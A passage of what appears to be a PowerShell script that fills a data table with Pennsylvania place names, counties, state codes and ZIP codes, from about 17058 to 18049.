$Cities.Rows.Add("Mifflin","Juniata","Pennsylvania","PA","42","17058") + $null = $Cities.Rows.Add("Mifflintown","Juniata","Pennsylvania","PA","42","17059") + $null = $Cities.Rows.Add("Mill creek","Huntingdon","Pennsylvania","PA","42","17060") + $null = $Cities.Rows.Add("Millersburg","Dauphin","Pennsylvania","PA","42","17061") + $null = $Cities.Rows.Add("Millerstown","Perry","Pennsylvania","PA","42","17062") + $null = $Cities.Rows.Add("Milroy","Mifflin","Pennsylvania","PA","42","17063") + $null = $Cities.Rows.Add("Mount gretna","Lebanon","Pennsylvania","PA","42","17064") + $null = $Cities.Rows.Add("Mount holly spri","Cumberland","Pennsylvania","PA","42","17065") + $null = $Cities.Rows.Add("Mount union","Huntingdon","Pennsylvania","PA","42","17066") + $null = $Cities.Rows.Add("Myerstown","Lebanon","Pennsylvania","PA","42","17067") + $null = $Cities.Rows.Add("New bloomfield","Perry","Pennsylvania","PA","42","17068") + $null = $Cities.Rows.Add("New buffalo","Perry","Pennsylvania","PA","42","17069") + $null = $Cities.Rows.Add("New cumberland","Cumberland","Pennsylvania","PA","42","17070") + $null = $Cities.Rows.Add("New kingstown","Cumberland","Pennsylvania","PA","42","17072") + $null = $Cities.Rows.Add("Newmanstown","Lebanon","Pennsylvania","PA","42","17073") + $null = $Cities.Rows.Add("Newport","Perry","Pennsylvania","PA","42","17074") + $null = $Cities.Rows.Add("Newton hamilton","Mifflin","Pennsylvania","PA","42","17075") + $null = $Cities.Rows.Add("Oakland mills","Juniata","Pennsylvania","PA","42","17076") + $null = $Cities.Rows.Add("Ono","Lebanon","Pennsylvania","PA","42","17077") + $null = $Cities.Rows.Add("Palmyra","Lebanon","Pennsylvania","PA","42","17078") + $null = $Cities.Rows.Add("Pillow","Dauphin","Pennsylvania","PA","42","17080") + $null = $Cities.Rows.Add("Plainfield","Cumberland","Pennsylvania","PA","42","17081") + $null = $Cities.Rows.Add("Port royal","Juniata","Pennsylvania","PA","42","17082") + $null = $Cities.Rows.Add("Quentin","Lebanon","Pennsylvania","PA","42","17083") + $null = $Cities.Rows.Add("Reedsville","Mifflin","Pennsylvania","PA","42","17084") + $null = $Cities.Rows.Add("Richfield","Juniata","Pennsylvania","PA","42","17086") + $null = $Cities.Rows.Add("Richland","Lebanon","Pennsylvania","PA","42","17087") + $null = $Cities.Rows.Add("Schaefferstown","Lebanon","Pennsylvania","PA","42","17088") + $null = $Cities.Rows.Add("Shermans dale","Perry","Pennsylvania","PA","42","17090") + $null = $Cities.Rows.Add("Summerdale","Cumberland","Pennsylvania","PA","42","17093") + $null = $Cities.Rows.Add("Thompsontown","Juniata","Pennsylvania","PA","42","17094") + $null = $Cities.Rows.Add("Wiconisco","Dauphin","Pennsylvania","PA","42","17097") + $null = $Cities.Rows.Add("Williamstown","Dauphin","Pennsylvania","PA","42","17098") + $null = $Cities.Rows.Add("Yeagertown","Mifflin","Pennsylvania","PA","42","17099") + $null = $Cities.Rows.Add("Zcta 170hh","Cumberland","Pennsylvania","PA","42","170HH") + $null = $Cities.Rows.Add("Zcta 170xx","Perry","Pennsylvania","PA","42","170XX") + $null = $Cities.Rows.Add("Harrisburg","Dauphin","Pennsylvania","PA","42","17101") + $null = $Cities.Rows.Add("Harrisburg","Dauphin","Pennsylvania","PA","42","17102") + $null = $Cities.Rows.Add("Penbrook","Dauphin","Pennsylvania","PA","42","17103") + $null = $Cities.Rows.Add("Harrisburg","Dauphin","Pennsylvania","PA","42","17104") + $null = $Cities.Rows.Add("Colonial park","Dauphin","Pennsylvania","PA","42","17109") + $null = $Cities.Rows.Add("Harrisburg","Dauphin","Pennsylvania","PA","42","17110") + $null = $Cities.Rows.Add("Swatara","Dauphin","Pennsylvania","PA","42","17111") + $null = $Cities.Rows.Add("Harrisburg","Dauphin","Pennsylvania","PA","42","17112") + $null = $Cities.Rows.Add("Steelton","Dauphin","Pennsylvania","PA","42","17113") + $null = $Cities.Rows.Add("Zcta 171hh","Dauphin","Pennsylvania","PA","42","171HH") + $null = $Cities.Rows.Add("Chambersburg","Franklin","Pennsylvania","PA","42","17201") + $null = $Cities.Rows.Add("Artemas","Bedford","Pennsylvania","PA","42","17211") + $null = $Cities.Rows.Add("Big cove tannery","Fulton","Pennsylvania","PA","42","17212") + $null = $Cities.Rows.Add("Blairs mills","Huntingdon","Pennsylvania","PA","42","17213") + $null = $Cities.Rows.Add("Blue ridge summi","Franklin","Pennsylvania","PA","42","17214") + $null = $Cities.Rows.Add("Burnt cabins","Fulton","Pennsylvania","PA","42","17215") + $null = $Cities.Rows.Add("Doylesburg","Franklin","Pennsylvania","PA","42","17219") + $null = $Cities.Rows.Add("Dry run","Franklin","Pennsylvania","PA","42","17220") + $null = $Cities.Rows.Add("Fannettsburg","Franklin","Pennsylvania","PA","42","17221") + $null = $Cities.Rows.Add("Fayetteville","Franklin","Pennsylvania","PA","42","17222") + $null = $Cities.Rows.Add("Fort littleton","Fulton","Pennsylvania","PA","42","17223") + $null = $Cities.Rows.Add("Fort loudon","Franklin","Pennsylvania","PA","42","17224") + $null = $Cities.Rows.Add("Greencastle","Franklin","Pennsylvania","PA","42","17225") + $null = $Cities.Rows.Add("Harrisonville","Fulton","Pennsylvania","PA","42","17228") + $null = $Cities.Rows.Add("Hustontown","Fulton","Pennsylvania","PA","42","17229") + $null = $Cities.Rows.Add("Mc connellsburg","Fulton","Pennsylvania","PA","42","17233") + $null = $Cities.Rows.Add("Marion","Franklin","Pennsylvania","PA","42","17235") + $null = $Cities.Rows.Add("Mercersburg","Franklin","Pennsylvania","PA","42","17236") + $null = $Cities.Rows.Add("Mont alto","Franklin","Pennsylvania","PA","42","17237") + $null = $Cities.Rows.Add("Needmore","Fulton","Pennsylvania","PA","42","17238") + $null = $Cities.Rows.Add("Neelyton","Huntingdon","Pennsylvania","PA","42","17239") + $null = $Cities.Rows.Add("Newburg","Cumberland","Pennsylvania","PA","42","17240") + $null = $Cities.Rows.Add("Newville","Cumberland","Pennsylvania","PA","42","17241") + $null = $Cities.Rows.Add("Orbisonia","Huntingdon","Pennsylvania","PA","42","17243") + $null = $Cities.Rows.Add("Orrstown","Franklin","Pennsylvania","PA","42","17244") + $null = $Cities.Rows.Add("Rockhill furnace","Huntingdon","Pennsylvania","PA","42","17249") + $null = $Cities.Rows.Add("Saint thomas","Franklin","Pennsylvania","PA","42","17252") + $null = $Cities.Rows.Add("Saltillo","Huntingdon","Pennsylvania","PA","42","17253") + $null = $Cities.Rows.Add("Scotland","Franklin","Pennsylvania","PA","42","17254") + $null = $Cities.Rows.Add("Shade gap","Huntingdon","Pennsylvania","PA","42","17255") + $null = $Cities.Rows.Add("Shippensburg","Cumberland","Pennsylvania","PA","42","17257") + $null = $Cities.Rows.Add("Shirleysburg","Huntingdon","Pennsylvania","PA","42","17260") + $null = $Cities.Rows.Add("Spring run","Franklin","Pennsylvania","PA","42","17262") + $null = $Cities.Rows.Add("Three springs","Huntingdon","Pennsylvania","PA","42","17264") + $null = $Cities.Rows.Add("Upperstrasburg","Franklin","Pennsylvania","PA","42","17265") + $null = $Cities.Rows.Add("Walnut bottom","Cumberland","Pennsylvania","PA","42","17266") + $null = $Cities.Rows.Add("Warfordsburg","Fulton","Pennsylvania","PA","42","17267") + $null = $Cities.Rows.Add("Waynesboro","Franklin","Pennsylvania","PA","42","17268") + $null = $Cities.Rows.Add("Williamson","Franklin","Pennsylvania","PA","42","17270") + $null = $Cities.Rows.Add("Willow hill","Franklin","Pennsylvania","PA","42","17271") + $null = $Cities.Rows.Add("Abbottstown","Adams","Pennsylvania","PA","42","17301") + $null = $Cities.Rows.Add("Airville","York","Pennsylvania","PA","42","17302") + $null = $Cities.Rows.Add("Aspers","Adams","Pennsylvania","PA","42","17304") + $null = $Cities.Rows.Add("Bendersville","Adams","Pennsylvania","PA","42","17306") + $null = $Cities.Rows.Add("Biglerville","Adams","Pennsylvania","PA","42","17307") + $null = $Cities.Rows.Add("Brogue","York","Pennsylvania","PA","42","17309") + $null = $Cities.Rows.Add("Codorus","York","Pennsylvania","PA","42","17311") + $null = $Cities.Rows.Add("Yoe","York","Pennsylvania","PA","42","17313") + $null = $Cities.Rows.Add("Delta","York","Pennsylvania","PA","42","17314") + $null = $Cities.Rows.Add("Dover","York","Pennsylvania","PA","42","17315") + $null = $Cities.Rows.Add("East berlin","Adams","Pennsylvania","PA","42","17316") + $null = $Cities.Rows.Add("East prospect","York","Pennsylvania","PA","42","17317") + $null = $Cities.Rows.Add("Emigsville","York","Pennsylvania","PA","42","17318") + $null = $Cities.Rows.Add("Etters","York","Pennsylvania","PA","42","17319") + $null = $Cities.Rows.Add("Greenstone","Adams","Pennsylvania","PA","42","17320") + $null = $Cities.Rows.Add("Fawn grove","York","Pennsylvania","PA","42","17321") + $null = $Cities.Rows.Add("Felton","York","Pennsylvania","PA","42","17322") + $null = $Cities.Rows.Add("Gardners","Cumberland","Pennsylvania","PA","42","17324") + $null = $Cities.Rows.Add("Gettysburg","Adams","Pennsylvania","PA","42","17325") + $null = $Cities.Rows.Add("Glen rock","York","Pennsylvania","PA","42","17327") + $null = $Cities.Rows.Add("Brodbecks","York","Pennsylvania","PA","42","17329") + $null = $Cities.Rows.Add("Hanover","York","Pennsylvania","PA","42","17331") + $null = $Cities.Rows.Add("Lewisberry","York","Pennsylvania","PA","42","17339") + $null = $Cities.Rows.Add("Littlestown","Adams","Pennsylvania","PA","42","17340") + $null = $Cities.Rows.Add("Mc knightstown","Adams","Pennsylvania","PA","42","17343") + $null = $Cities.Rows.Add("Mc sherrystown","Adams","Pennsylvania","PA","42","17344") + $null = $Cities.Rows.Add("Manchester","York","Pennsylvania","PA","42","17345") + $null = $Cities.Rows.Add("Mount wolf","York","Pennsylvania","PA","42","17347") + $null = $Cities.Rows.Add("New freedom","York","Pennsylvania","PA","42","17349") + $null = $Cities.Rows.Add("New oxford","Adams","Pennsylvania","PA","42","17350") + $null = $Cities.Rows.Add("New park","York","Pennsylvania","PA","42","17352") + $null = $Cities.Rows.Add("Orrtanna","Adams","Pennsylvania","PA","42","17353") + $null = $Cities.Rows.Add("Railroad","York","Pennsylvania","PA","42","17355") + $null = $Cities.Rows.Add("Red lion","York","Pennsylvania","PA","42","17356") + $null = $Cities.Rows.Add("Seven valleys","York","Pennsylvania","PA","42","17360") + $null = $Cities.Rows.Add("Shrewsbury","York","Pennsylvania","PA","42","17361") + $null = $Cities.Rows.Add("Spring grove","York","Pennsylvania","PA","42","17362") + $null = $Cities.Rows.Add("Stewartstown","York","Pennsylvania","PA","42","17363") + $null = $Cities.Rows.Add("Thomasville","York","Pennsylvania","PA","42","17364") + $null = $Cities.Rows.Add("Wellsville","York","Pennsylvania","PA","42","17365") + $null = $Cities.Rows.Add("Windsor","York","Pennsylvania","PA","42","17366") + $null = $Cities.Rows.Add("Wrightsville","York","Pennsylvania","PA","42","17368") + $null = $Cities.Rows.Add("York haven","York","Pennsylvania","PA","42","17370") + $null = $Cities.Rows.Add("York springs","Adams","Pennsylvania","PA","42","17372") + $null = $Cities.Rows.Add("Zcta 173hh","York","Pennsylvania","PA","42","173HH") + $null = $Cities.Rows.Add("York","York","Pennsylvania","PA","42","17401") + $null = $Cities.Rows.Add("East york","York","Pennsylvania","PA","42","17402") + $null = $Cities.Rows.Add("York","York","Pennsylvania","PA","42","17403") + $null = $Cities.Rows.Add("West york","York","Pennsylvania","PA","42","17404") + $null = $Cities.Rows.Add("Hellam","York","Pennsylvania","PA","42","17406") + $null = $Cities.Rows.Add("Jacobus","York","Pennsylvania","PA","42","17407") + $null = $Cities.Rows.Add("Zcta 174hh","York","Pennsylvania","PA","42","174HH") + $null = $Cities.Rows.Add("Akron","Lancaster","Pennsylvania","PA","42","17501") + $null = $Cities.Rows.Add("Bainbridge","Lancaster","Pennsylvania","PA","42","17502") + $null = $Cities.Rows.Add("Bird in hand","Lancaster","Pennsylvania","PA","42","17505") + $null = $Cities.Rows.Add("Brownstown","Lancaster","Pennsylvania","PA","42","17508") + $null = $Cities.Rows.Add("Ninepoints","Lancaster","Pennsylvania","PA","42","17509") + $null = $Cities.Rows.Add("Columbia","Lancaster","Pennsylvania","PA","42","17512") + $null = $Cities.Rows.Add("Conestoga","Lancaster","Pennsylvania","PA","42","17516") + $null = $Cities.Rows.Add("Denver","Lancaster","Pennsylvania","PA","42","17517") + $null = $Cities.Rows.Add("Drumore","Lancaster","Pennsylvania","PA","42","17518") + $null = $Cities.Rows.Add("East earl","Lancaster","Pennsylvania","PA","42","17519") + $null = $Cities.Rows.Add("East petersburg","Lancaster","Pennsylvania","PA","42","17520") + $null = $Cities.Rows.Add("Ephrata","Lancaster","Pennsylvania","PA","42","17522") + $null = $Cities.Rows.Add("Gap","Lancaster","Pennsylvania","PA","42","17527") + $null = $Cities.Rows.Add("Gordonville","Lancaster","Pennsylvania","PA","42","17529") + $null = $Cities.Rows.Add("Holtwood","Lancaster","Pennsylvania","PA","42","17532") + $null = $Cities.Rows.Add("Kinzers","Lancaster","Pennsylvania","PA","42","17535") + $null = $Cities.Rows.Add("Kirkwood","Lancaster","Pennsylvania","PA","42","17536") + $null = $Cities.Rows.Add("Salunga","Lancaster","Pennsylvania","PA","42","17538") + $null = $Cities.Rows.Add("Leola","Lancaster","Pennsylvania","PA","42","17540") + $null = $Cities.Rows.Add("Brunnerville","Lancaster","Pennsylvania","PA","42","17543") + $null = $Cities.Rows.Add("Manheim","Lancaster","Pennsylvania","PA","42","17545") + $null = $Cities.Rows.Add("Marietta","Lancaster","Pennsylvania","PA","42","17547") + $null = $Cities.Rows.Add("Millersville","Lancaster","Pennsylvania","PA","42","17551") + $null = $Cities.Rows.Add("Florin","Lancaster","Pennsylvania","PA","42","17552") + $null = $Cities.Rows.Add("Mountville","Lancaster","Pennsylvania","PA","42","17554") + $null = $Cities.Rows.Add("Narvon","Lancaster","Pennsylvania","PA","42","17555") + $null = $Cities.Rows.Add("New holland","Lancaster","Pennsylvania","PA","42","17557") + $null = $Cities.Rows.Add("New providence","Lancaster","Pennsylvania","PA","42","17560") + $null = $Cities.Rows.Add("Paradise","Lancaster","Pennsylvania","PA","42","17562") + $null = $Cities.Rows.Add("Peach bottom","Lancaster","Pennsylvania","PA","42","17563") + $null = $Cities.Rows.Add("Pequea","Lancaster","Pennsylvania","PA","42","17565") + $null = $Cities.Rows.Add("Quarryville","Lancaster","Pennsylvania","PA","42","17566") + $null = $Cities.Rows.Add("Reinholds","Lancaster","Pennsylvania","PA","42","17569") + $null = $Cities.Rows.Add("Rheems","Lancaster","Pennsylvania","PA","42","17570") + $null = $Cities.Rows.Add("Ronks","Lancaster","Pennsylvania","PA","42","17572") + $null = $Cities.Rows.Add("Smoketown","Lancaster","Pennsylvania","PA","42","17576") + $null = $Cities.Rows.Add("Stevens","Lancaster","Pennsylvania","PA","42","17578") + $null = $Cities.Rows.Add("Strasburg","Lancaster","Pennsylvania","PA","42","17579") + $null = $Cities.Rows.Add("Terre hill","Lancaster","Pennsylvania","PA","42","17581") + $null = $Cities.Rows.Add("Washington boro","Lancaster","Pennsylvania","PA","42","17582") + $null = $Cities.Rows.Add("Willow street","Lancaster","Pennsylvania","PA","42","17584") + $null = $Cities.Rows.Add("Zcta 175hh","Lancaster","Pennsylvania","PA","42","175HH") + $null = $Cities.Rows.Add("Neffsville","Lancaster","Pennsylvania","PA","42","17601") + $null = $Cities.Rows.Add("Lancaster","Lancaster","Pennsylvania","PA","42","17602") + $null = $Cities.Rows.Add("Rohrerstown","Lancaster","Pennsylvania","PA","42","17603") + $null = $Cities.Rows.Add("Zcta 176hh","Lancaster","Pennsylvania","PA","42","176HH") + $null = $Cities.Rows.Add("South williamspo","Lycoming","Pennsylvania","PA","42","17701") + $null = $Cities.Rows.Add("Zcta 17702","Lycoming","Pennsylvania","PA","42","17702") + $null = $Cities.Rows.Add("Avis","Clinton","Pennsylvania","PA","42","17721") + $null = $Cities.Rows.Add("Canton","Bradford","Pennsylvania","PA","42","17724") + $null = $Cities.Rows.Add("Cogan station","Lycoming","Pennsylvania","PA","42","17728") + $null = $Cities.Rows.Add("Cross fork","Potter","Pennsylvania","PA","42","17729") + $null = $Cities.Rows.Add("Dewart","Northumberland","Pennsylvania","PA","42","17730") + $null = $Cities.Rows.Add("Eagles mere","Sullivan","Pennsylvania","PA","42","17731") + $null = $Cities.Rows.Add("Hughesville","Lycoming","Pennsylvania","PA","42","17737") + $null = $Cities.Rows.Add("Hyner","Clinton","Pennsylvania","PA","42","17738") + $null = $Cities.Rows.Add("Jersey mills","Lycoming","Pennsylvania","PA","42","17739") + $null = $Cities.Rows.Add("Salladasburg","Lycoming","Pennsylvania","PA","42","17740") + $null = $Cities.Rows.Add("Lairdsville","Lycoming","Pennsylvania","PA","42","17742") + $null = $Cities.Rows.Add("Linden","Lycoming","Pennsylvania","PA","42","17744") + $null = $Cities.Rows.Add("Lock haven","Clinton","Pennsylvania","PA","42","17745") + $null = $Cities.Rows.Add("Loganton","Clinton","Pennsylvania","PA","42","17747") + $null = $Cities.Rows.Add("Mc elhattan","Clinton","Pennsylvania","PA","42","17748") + $null = $Cities.Rows.Add("Mc ewensville","Northumberland","Pennsylvania","PA","42","17749") + $null = $Cities.Rows.Add("Mackeyville","Clinton","Pennsylvania","PA","42","17750") + $null = $Cities.Rows.Add("Mill hall","Clinton","Pennsylvania","PA","42","17751") + $null = $Cities.Rows.Add("Montgomery","Lycoming","Pennsylvania","PA","42","17752") + $null = $Cities.Rows.Add("Montoursville","Lycoming","Pennsylvania","PA","42","17754") + $null = $Cities.Rows.Add("Muncy","Lycoming","Pennsylvania","PA","42","17756") + $null = $Cities.Rows.Add("Muncy valley","Sullivan","Pennsylvania","PA","42","17758") + $null = $Cities.Rows.Add("North bend","Clinton","Pennsylvania","PA","42","17760") + $null = $Cities.Rows.Add("Picture rocks","Lycoming","Pennsylvania","PA","42","17762") + $null = $Cities.Rows.Add("Ralston","Lycoming","Pennsylvania","PA","42","17763") + $null = $Cities.Rows.Add("Renovo","Clinton","Pennsylvania","PA","42","17764") + $null = $Cities.Rows.Add("Roaring branch","Tioga","Pennsylvania","PA","42","17765") + $null = $Cities.Rows.Add("Salona","Clinton","Pennsylvania","PA","42","17767") + $null = $Cities.Rows.Add("Shunk","Sullivan","Pennsylvania","PA","42","17768") + $null = $Cities.Rows.Add("Trout run","Lycoming","Pennsylvania","PA","42","17771") + $null = $Cities.Rows.Add("Turbotville","Northumberland","Pennsylvania","PA","42","17772") + $null = $Cities.Rows.Add("Unityville","Lycoming","Pennsylvania","PA","42","17774") + $null = $Cities.Rows.Add("Waterville","Lycoming","Pennsylvania","PA","42","17776") + $null = $Cities.Rows.Add("Watsontown","Northumberland","Pennsylvania","PA","42","17777") + $null = $Cities.Rows.Add("Westport","Clinton","Pennsylvania","PA","42","17778") + $null = $Cities.Rows.Add("Zcta 177hh","Clinton","Pennsylvania","PA","42","177HH") + $null = $Cities.Rows.Add("Zcta 177xx","Clinton","Pennsylvania","PA","42","177XX") + $null = $Cities.Rows.Add("Sunbury","Northumberland","Pennsylvania","PA","42","17801") + $null = $Cities.Rows.Add("Allenwood","Union","Pennsylvania","PA","42","17810") + $null = $Cities.Rows.Add("Beaver springs","Snyder","Pennsylvania","PA","42","17812") + $null = $Cities.Rows.Add("Beavertown","Snyder","Pennsylvania","PA","42","17813") + $null = $Cities.Rows.Add("Benton","Columbia","Pennsylvania","PA","42","17814") + $null = $Cities.Rows.Add("Bloomsburg","Columbia","Pennsylvania","PA","42","17815") + $null = $Cities.Rows.Add("Catawissa","Columbia","Pennsylvania","PA","42","17820") + $null = $Cities.Rows.Add("Danville","Montour","Pennsylvania","PA","42","17821") + $null = $Cities.Rows.Add("Dornsife","Northumberland","Pennsylvania","PA","42","17823") + $null = $Cities.Rows.Add("Elysburg","Northumberland","Pennsylvania","PA","42","17824") + $null = $Cities.Rows.Add("Excelsior","Northumberland","Pennsylvania","PA","42","17825") + $null = $Cities.Rows.Add("Freeburg","Snyder","Pennsylvania","PA","42","17827") + $null = $Cities.Rows.Add("Hartleton","Union","Pennsylvania","PA","42","17829") + $null = $Cities.Rows.Add("Herndon","Northumberland","Pennsylvania","PA","42","17830") + $null = $Cities.Rows.Add("Marion heights","Northumberland","Pennsylvania","PA","42","17832") + $null = $Cities.Rows.Add("Kreamer","Snyder","Pennsylvania","PA","42","17833") + $null = $Cities.Rows.Add("Kulpmont","Northumberland","Pennsylvania","PA","42","17834") + $null = $Cities.Rows.Add("Laurelton","Union","Pennsylvania","PA","42","17835") + $null = $Cities.Rows.Add("Leck kill","Northumberland","Pennsylvania","PA","42","17836") + $null = $Cities.Rows.Add("Lewisburg","Union","Pennsylvania","PA","42","17837") + $null = $Cities.Rows.Add("Locust gap","Northumberland","Pennsylvania","PA","42","17840") + $null = $Cities.Rows.Add("Mc clure","Mifflin","Pennsylvania","PA","42","17841") + $null = $Cities.Rows.Add("Middleburg","Snyder","Pennsylvania","PA","42","17842") + $null = $Cities.Rows.Add("Mifflinburg","Union","Pennsylvania","PA","42","17844") + $null = $Cities.Rows.Add("Millmont","Union","Pennsylvania","PA","42","17845") + $null = $Cities.Rows.Add("Millville","Columbia","Pennsylvania","PA","42","17846") + $null = $Cities.Rows.Add("Milton","Northumberland","Pennsylvania","PA","42","17847") + $null = $Cities.Rows.Add("Montandon","Northumberland","Pennsylvania","PA","42","17850") + $null = $Cities.Rows.Add("Mount carmel","Northumberland","Pennsylvania","PA","42","17851") + $null = $Cities.Rows.Add("Mount pleasant m","Snyder","Pennsylvania","PA","42","17853") + $null = $Cities.Rows.Add("New berlin","Union","Pennsylvania","PA","42","17855") + $null = $Cities.Rows.Add("New columbia","Union","Pennsylvania","PA","42","17856") + $null = $Cities.Rows.Add("Northumberland","Northumberland","Pennsylvania","PA","42","17857") + $null = $Cities.Rows.Add("Orangeville","Columbia","Pennsylvania","PA","42","17859") + $null = $Cities.Rows.Add("Paxinos","Northumberland","Pennsylvania","PA","42","17860") + $null = $Cities.Rows.Add("Paxtonville","Snyder","Pennsylvania","PA","42","17861") + $null = $Cities.Rows.Add("Penns creek","Snyder","Pennsylvania","PA","42","17862") + $null = $Cities.Rows.Add("Port trevorton","Snyder","Pennsylvania","PA","42","17864") + $null = $Cities.Rows.Add("Potts grove","Northumberland","Pennsylvania","PA","42","17865") + $null = $Cities.Rows.Add("Ranshaw","Northumberland","Pennsylvania","PA","42","17866") + $null = $Cities.Rows.Add("Rebuck","Northumberland","Pennsylvania","PA","42","17867") + $null = $Cities.Rows.Add("Riverside","Northumberland","Pennsylvania","PA","42","17868") + $null = $Cities.Rows.Add("Selinsgrove","Snyder","Pennsylvania","PA","42","17870") + $null = $Cities.Rows.Add("Excelsior","Northumberland","Pennsylvania","PA","42","17872") + $null = $Cities.Rows.Add("Stillwater","Columbia","Pennsylvania","PA","42","17878") + $null = $Cities.Rows.Add("Trevorton","Northumberland","Pennsylvania","PA","42","17881") + $null = $Cities.Rows.Add("Troxelville","Snyder","Pennsylvania","PA","42","17882") + $null = $Cities.Rows.Add("Washingtonville","Montour","Pennsylvania","PA","42","17884") + $null = $Cities.Rows.Add("Weikert","Union","Pennsylvania","PA","42","17885") + $null = $Cities.Rows.Add("West milton","Union","Pennsylvania","PA","42","17886") + $null = $Cities.Rows.Add("White deer","Union","Pennsylvania","PA","42","17887") + $null = $Cities.Rows.Add("Wilburton","Columbia","Pennsylvania","PA","42","17888") + $null = $Cities.Rows.Add("Winfield","Union","Pennsylvania","PA","42","17889") + $null = $Cities.Rows.Add("Zcta 178hh","Columbia","Pennsylvania","PA","42","178HH") + $null = $Cities.Rows.Add("Zcta 178xx","Union","Pennsylvania","PA","42","178XX") + $null = $Cities.Rows.Add("Pottsville","Schuylkill","Pennsylvania","PA","42","17901") + $null = $Cities.Rows.Add("Aristes","Columbia","Pennsylvania","PA","42","17920") + $null = $Cities.Rows.Add("Ashland","Schuylkill","Pennsylvania","PA","42","17921") + $null = $Cities.Rows.Add("Auburn","Schuylkill","Pennsylvania","PA","42","17922") + $null = $Cities.Rows.Add("Branchdale","Schuylkill","Pennsylvania","PA","42","17923") + $null = $Cities.Rows.Add("Brockton","Schuylkill","Pennsylvania","PA","42","17925") + $null = $Cities.Rows.Add("Centralia","Columbia","Pennsylvania","PA","42","17927") + $null = $Cities.Rows.Add("Cressona","Schuylkill","Pennsylvania","PA","42","17929") + $null = $Cities.Rows.Add("Cumbola","Schuylkill","Pennsylvania","PA","42","17930") + $null = $Cities.Rows.Add("Frackville","Schuylkill","Pennsylvania","PA","42","17931") + $null = $Cities.Rows.Add("Friedensburg","Schuylkill","Pennsylvania","PA","42","17933") + $null = $Cities.Rows.Add("Gilberton","Schuylkill","Pennsylvania","PA","42","17934") + $null = $Cities.Rows.Add("Girardville","Schuylkill","Pennsylvania","PA","42","17935") + $null = $Cities.Rows.Add("Gordon","Schuylkill","Pennsylvania","PA","42","17936") + $null = $Cities.Rows.Add("Hegins","Schuylkill","Pennsylvania","PA","42","17938") + $null = $Cities.Rows.Add("Klingerstown","Schuylkill","Pennsylvania","PA","42","17941") + $null = $Cities.Rows.Add("Lavelle","Schuylkill","Pennsylvania","PA","42","17943") + $null = $Cities.Rows.Add("Llewellyn","Schuylkill","Pennsylvania","PA","42","17944") + $null = $Cities.Rows.Add("Locustdale","Columbia","Pennsylvania","PA","42","17945") + $null = $Cities.Rows.Add("Lost creek","Schuylkill","Pennsylvania","PA","42","17946") + $null = $Cities.Rows.Add("Mahanoy city","Schuylkill","Pennsylvania","PA","42","17948") + $null = $Cities.Rows.Add("Mahanoy plane","Schuylkill","Pennsylvania","PA","42","17949") + $null = $Cities.Rows.Add("Mar lin","Schuylkill","Pennsylvania","PA","42","17951") + $null = $Cities.Rows.Add("Mary d","Schuylkill","Pennsylvania","PA","42","17952") + $null = $Cities.Rows.Add("Middleport","Schuylkill","Pennsylvania","PA","42","17953") + $null = $Cities.Rows.Add("Minersville","Schuylkill","Pennsylvania","PA","42","17954") + $null = $Cities.Rows.Add("Muir","Schuylkill","Pennsylvania","PA","42","17957") + $null = $Cities.Rows.Add("Kaska","Schuylkill","Pennsylvania","PA","42","17959") + $null = $Cities.Rows.Add("New ringgold","Schuylkill","Pennsylvania","PA","42","17960") + $null = $Cities.Rows.Add("Orwigsburg","Schuylkill","Pennsylvania","PA","42","17961") + $null = $Cities.Rows.Add("Pine grove","Schuylkill","Pennsylvania","PA","42","17963") + $null = $Cities.Rows.Add("Pitman","Schuylkill","Pennsylvania","PA","42","17964") + $null = $Cities.Rows.Add("Port carbon","Schuylkill","Pennsylvania","PA","42","17965") + $null = $Cities.Rows.Add("Ringtown","Schuylkill","Pennsylvania","PA","42","17967") + $null = $Cities.Rows.Add("Sacramento","Schuylkill","Pennsylvania","PA","42","17968") + $null = $Cities.Rows.Add("Saint clair","Schuylkill","Pennsylvania","PA","42","17970") + $null = $Cities.Rows.Add("Schuylkill haven","Schuylkill","Pennsylvania","PA","42","17972") + $null = $Cities.Rows.Add("Seltzer","Schuylkill","Pennsylvania","PA","42","17974") + $null = $Cities.Rows.Add("Shenandoah","Schuylkill","Pennsylvania","PA","42","17976") + $null = $Cities.Rows.Add("Spring glen","Schuylkill","Pennsylvania","PA","42","17978") + $null = $Cities.Rows.Add("Summit station","Schuylkill","Pennsylvania","PA","42","17979") + $null = $Cities.Rows.Add("Tower city","Schuylkill","Pennsylvania","PA","42","17980") + $null = $Cities.Rows.Add("Donaldson","Schuylkill","Pennsylvania","PA","42","17981") + $null = $Cities.Rows.Add("Tuscarora","Schuylkill","Pennsylvania","PA","42","17982") + $null = $Cities.Rows.Add("Valley view","Schuylkill","Pennsylvania","PA","42","17983") + $null = $Cities.Rows.Add("Zion grove","Schuylkill","Pennsylvania","PA","42","17985") + $null = $Cities.Rows.Add("Zcta 179hh","Schuylkill","Pennsylvania","PA","42","179HH") + $null = $Cities.Rows.Add("Alburtis","Lehigh","Pennsylvania","PA","42","18011") + $null = $Cities.Rows.Add("Aquashicola","Carbon","Pennsylvania","PA","42","18012") + $null = $Cities.Rows.Add("Roseto","Northampton","Pennsylvania","PA","42","18013") + $null = $Cities.Rows.Add("Bath","Northampton","Pennsylvania","PA","42","18014") + $null = $Cities.Rows.Add("Bethlehem","Northampton","Pennsylvania","PA","42","18015") + $null = $Cities.Rows.Add("Butztown","Northampton","Pennsylvania","PA","42","18017") + $null = $Cities.Rows.Add("Bethlehem","Lehigh","Pennsylvania","PA","42","18018") + $null = $Cities.Rows.Add("Zcta 18020","Northampton","Pennsylvania","PA","42","18020") + $null = $Cities.Rows.Add("Bowmanstown","Carbon","Pennsylvania","PA","42","18030") + $null = $Cities.Rows.Add("Breinigsville","Lehigh","Pennsylvania","PA","42","18031") + $null = $Cities.Rows.Add("Catasauqua","Lehigh","Pennsylvania","PA","42","18032") + $null = $Cities.Rows.Add("Center valley","Lehigh","Pennsylvania","PA","42","18034") + $null = $Cities.Rows.Add("Cherryville","Northampton","Pennsylvania","PA","42","18035") + $null = $Cities.Rows.Add("Coopersburg","Lehigh","Pennsylvania","PA","42","18036") + $null = $Cities.Rows.Add("Coplay","Lehigh","Pennsylvania","PA","42","18037") + $null = $Cities.Rows.Add("Danielsville","Northampton","Pennsylvania","PA","42","18038") + $null = $Cities.Rows.Add("Zcta 18040","Northampton","Pennsylvania","PA","42","18040") + $null = $Cities.Rows.Add("East greenville","Montgomery","Pennsylvania","PA","42","18041") + $null = $Cities.Rows.Add("Forks township","Northampton","Pennsylvania","PA","42","18042") + $null = $Cities.Rows.Add("Zcta 18045","Northampton","Pennsylvania","PA","42","18045") + $null = $Cities.Rows.Add("Emmaus","Lehigh","Pennsylvania","PA","42","18049") + $null = 